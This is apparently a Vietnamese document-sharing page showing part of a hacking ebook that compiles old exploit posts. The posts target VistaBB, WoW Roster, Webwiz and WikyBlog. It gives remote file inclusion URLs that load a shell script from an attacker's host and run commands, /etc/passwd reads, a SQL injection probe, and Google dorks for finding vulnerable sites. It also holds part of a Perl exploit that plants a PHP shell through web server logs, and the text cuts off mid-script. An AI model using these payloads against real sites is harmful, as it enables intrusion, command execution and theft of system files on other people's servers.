1. Trang chủ
  2. » Công Nghệ Thông Tin

Hacker Professional Ebook part 438 doc

6 64 0
Tài liệu đã được kiểm tra trùng lặp

Đang tải... (xem toàn văn)

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 6
Dung lượng 59,65 KB

Các công cụ chuyển đổi và chỉnh sửa cho tài liệu này

Nội dung

Hoặc exploit bằng tay : Trích: GET -> http://[site]/[vistabbpath]/includes/functions_mod_user.php?phpbb_root_path=[FI LE] EXAMPLE -> http://[site]/[vistabbpath]/includes/functions_mod_us

Trang 1

Hoặc exploit bằng tay :

Trích:

GET ->

http://[site]/[vistabbpath]/includes/functions_mod_user.php?phpbb_root_path=[FI LE]

EXAMPLE ->

http://[site]/[vistabbpath]/includes/functions_mod_user.php?phpbb_root_path=http ://yoursite.com/cmd.txt?

EXAMPLE ->

http://[site]/[vistabbpath]/includes/functions_mod_user.php?phpbb_root_path=/etc/ passwd%00 <- mq off

GET ->

http://[site]/[vistabbpath]/includes/functions_portal.php?phpbb_root_path=[FILE] EXAMPLE ->

http://[site]/[vistabbpath]/includes/functions_portal.php?phpbb_root_path=http://yo ursite.com/cmd.txt?

EXAMPLE ->

http://[site]/[vistabbpath]/includes/functions_portal.php?phpbb_root_path=/etc/pas swd%00 <- mq off

Ask Google : "Powered by VistaBB"

Còn đây là Source cho những ai muốn ngâm kíu hoặc "dùng thử"

http://www.vistabb.net/dosyalar/zip_vistabb_v2060.zip

navaro(HCE)

Voodoo chat <= 1.0RC1b (file_path) Remote File Inclusion Vulnerability

Trang 2

Code:

-

Title : WoW Roster <= 1.5.1 Remote File Include Vulnerabilities

##################################################################

#############

Discovered By Skulmatic

-

Affected software description :

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : World of Warcraft (WoW) Roster

URL : http://www.wowroster.net/

-

dork : "wow roster version 1.5.*"

Exploit :

http://[target]/[wow_roster_path]/conf.php?subdir=http://[attacker]/cmd.txt?&cmd

=ls

-

greatz:

~~~~

# special to song hye kyo (for inspiration)

# To all members of #papmahackerlink and #hackid, OLiBekaS, cgibin, weleh, skulmatic, sikunYuk, brokencode, ulga, SaMuR4i_X, bigmaster

-

Contact:

~~~~~~

Nick: skulmatic

E-mail: skulmatic[at]gmail[dot]Com

- [ eof ] -

# milw0rm.com [2006-08-01]

Trang 3

vns3curity(HCE)

Webwiz SQL Injection

-Version: All

-PoC:

site/forumpath/search.asp?KM='

Have fun!

Marriotvn(HCE)

Webwiz SQL Injection

-Version: All

-PoC:

site/forumpath/search.asp?KM='

Have fun!

Marriotvn(HCE)

WikyBlog 1.3.2 (include/WBmap.php) Local File Inclusion

Code:

##################################################################

###############################

# r0ut3r Presents #

# #

# Another r0ut3r discovery! #

# writ3r [at] gmail.com #

# #

# WikyBlog Local File Inclusion Exploit #

################################################################## ############################### # Software: WikyBlog 1.3 #

# #

Trang 4

# Vendor: http://www.wikyblog.com/ #

# #

# Released: 2006/12/01 #

# #

# Discovered & Exploit By: r0ut3r (writ3r [at] gmail.com)

# # #

# Note: The information provided in this document is for WikyBlog administrator

# # testing purposes only! #

# #

# This exploit makes use of a local file inclusion exploit in #

# WikyBlog to allow command execution Firstly it locates an

# # access_log, or error_log then it inserts a PHP Shell into #

# the log file and returns a link for command execution #

# #

# include/WBmap.php?l=file_to_include%00 #

# register_globals being on does not affect this vulnerability #

################################################################## ############################### use IO::Socket; use Switch; $port = "80"; # connection port $target = @ARGV[0]; # localhost $folder = @ARGV[1]; # /wikyblog/ sub Header() { print q {################################################################# ################################ # r0ut3r Presents #

# #

# Another r0ut3r discovery! #

# writ3r [at] gmail.com #

# #

Trang 5

# WikyBlog Local File Inclusion Exploit #

##################################################################

###############################

};

}

sub Usage()

{

print q {Usage: wikyblogxpl1.3.pl [target] [folder]

Example: wikyblogxpl1.3.pl localhost /wikyblog/

};

exit();

}

Header();

if (!$target || !$folder) {

Usage(); }

# log list taken from Kacper's http://www.milw0rm.com/exploits/2253

@paths=(

" / / / / /var/log/httpd/access_log",

" / / / / /var/log/httpd/error_log",

" /apache/logs/error.log",

" /apache/logs/access.log",

" / /apache/logs/error.log",

" / /apache/logs/access.log",

" / / /apache/logs/error.log",

" / / /apache/logs/access.log",

" / / / /apache/logs/error.log",

" / / / /apache/logs/access.log",

" / / / / /apache/logs/error.log",

" / / / / /apache/logs/access.log",

" /logs/error.log",

" /logs/access.log",

" / /logs/error.log",

" / /logs/access.log",

" / / /logs/error.log",

" / / /logs/access.log",

Trang 6

" / / / /logs/error.log",

" / / / /logs/access.log",

" / / / / /logs/error.log",

" / / / / /logs/access.log",

" / / / / /etc/httpd/logs/access_log",

" / / / / /etc/httpd/logs/access.log",

" / / / / /etc/httpd/logs/error_log",

" / / / / /etc/httpd/logs/error.log",

" / / / / /var/www/logs/access_log",

" / / / / /var/www/logs/access.log",

" / / / / /usr/local/apache/logs/access_log",

" / / / / /usr/local/apache/logs/access.log",

" / / / / /var/log/apache/access_log",

" / / / / /var/log/apache/access.log",

" / / / / /var/log/access_log",

" / / / / /var/www/logs/error_log",

" / / / / /var/www/logs/error.log",

" / / / / /usr/local/apache/logs/error_log",

" / / / / /usr/local/apache/logs/error.log",

" / / / / /var/log/apache/error_log",

" / / / / /var/log/apache/error.log",

" / / / / /var/log/access_log",

" / / / / /var/log/error_log"

);

print "[+] Attempting to locate log file\n";

$log = "";

foreach $path (@paths)

{

Ngày đăng: 04/07/2014, 12:20

TỪ KHÓA LIÊN QUAN